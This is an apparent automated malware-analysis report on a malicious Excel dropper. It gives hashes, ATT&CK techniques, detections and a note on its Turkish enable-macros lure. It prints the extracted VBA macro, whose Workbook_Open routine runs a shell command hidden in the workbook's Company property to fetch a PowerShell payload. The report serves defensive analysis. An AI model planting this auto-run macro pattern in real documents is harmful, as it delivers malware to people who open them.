Office (OLE) malware analysis — malicious · a48bfe0af239e222

MALICIOUS

Office (OLE)

42.5 KB Created: 2018-10-21 06:35:20 Authoring application: Microsoft Excel First seen: 2019-05-16

MD5: 1d20b7284271fad1d7c2da77d10c8143 SHA-1: 7ded2f99593dad3303b3a02c48569721407baff3 SHA-256: a48bfe0af239e2226bbd2a93b8b0d3e90ab259ba4a6e645cbeec4fbd168f4bd0

188 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1059.001 PowerShell T1203 Exploitation for Client Execution

The sample is an Excel document containing a Workbook_Open macro that uses the Shell() function to execute PowerShell. The document body displays a fake error message in Turkish, prompting the user to enable macros, which is a common social engineering tactic. The macro's intent is to download and execute a second-stage payload via PowerShell.

Heuristics 5

ClamAV: Doc.Dropper.Agent-6967028-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6967028-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code

Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA

Matched line in script

Private Function wkftr() As Byte
Call VBA.Shell$(ActiveWorkbook.BuiltinDocumentProperties("CoMPANY").Value, 0)
End Function

Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro

Matched line in script

Option Explicit
Static Sub woRkbook_OPEN(): Call wkftr: End Sub
Private Function wkftr() As Byte

Reference to PowerShell high SC_STR_POWERSHELL

Reference to PowerShell

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 816 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	816 bytes
SHA-256: `eea3c6057d90989ed2b29c002acc14f8bd5e8514f4c58181e34d1f47796472fe`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Transformationdoc" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "TranformationsDocs" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Option Explicit Static Sub woRkbook_OPEN(): Call wkftr: End Sub Private Function wkftr() As Byte Call VBA.Shell$(ActiveWorkbook.BuiltinDocumentProperties("CoMPANY").Value, 0) End Function

SHA-256: eea3c6057d90989ed2b29c002acc14f8bd5e8514f4c58181e34d1f47796472fe

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Transformationdoc"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "TranformationsDocs"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Static Sub woRkbook_OPEN(): Call wkftr: End Sub
Private Function wkftr() As Byte
Call VBA.Shell$(ActiveWorkbook.BuiltinDocumentProperties("CoMPANY").Value, 0)
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.